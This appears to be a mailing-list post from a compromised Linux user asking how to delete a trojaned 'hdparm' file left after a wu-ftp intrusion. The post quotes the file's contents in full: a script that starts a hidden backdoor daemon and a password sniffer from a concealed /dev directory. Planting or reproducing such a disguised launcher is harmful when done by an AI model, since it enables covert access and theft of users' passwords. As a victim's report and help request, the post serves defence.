Hello -
I was the victim of a cracker who exploited wu-ftp 2.6.0
I've since upgraded to 2.6.2, and disabled or removed almost
all of the hidden programs he left behind, but I accidently
found another one. The problem is I cannot rm it.
I use Linux 2.2.16 and bash.
I wanted to update my hdparm file from 3.9 to 4.6 so I did
a 'locate hdparm' and found I had a copy in both /usr/bin
and /usr/sbin. Curious, I did 'which hdparm' and found it
was the one in /usr/sbin. So what was the other one?
It turned out to be a perl script to call the hacker's
sniffer. I tried to move it. I tried to edit it with vi.
The permissions were 500, so I tried to chmod 700. I tried
to rm it. Nothing. I get this message:
"Cannot unlink hdparm: Operation not permitted."
Can you tell me how to get rid of this offensive piece of
garbage? BTW, this is the contents of the file:
#!/bin/sh
cd /dev/ida/.inet
./sshdu -f ./s
./linsniffer >> ./tcp.log &
cd /
I found that tcp.log contained plain text passwords of every user
on my system. scarey!
-Roy Wilson-
[EMAIL PROTECTED]
_______________________________________________
Bug-fileutils mailing list
[EMAIL PROTECTED]
http://mail.gnu.org/mailman/listinfo/bug-fileutils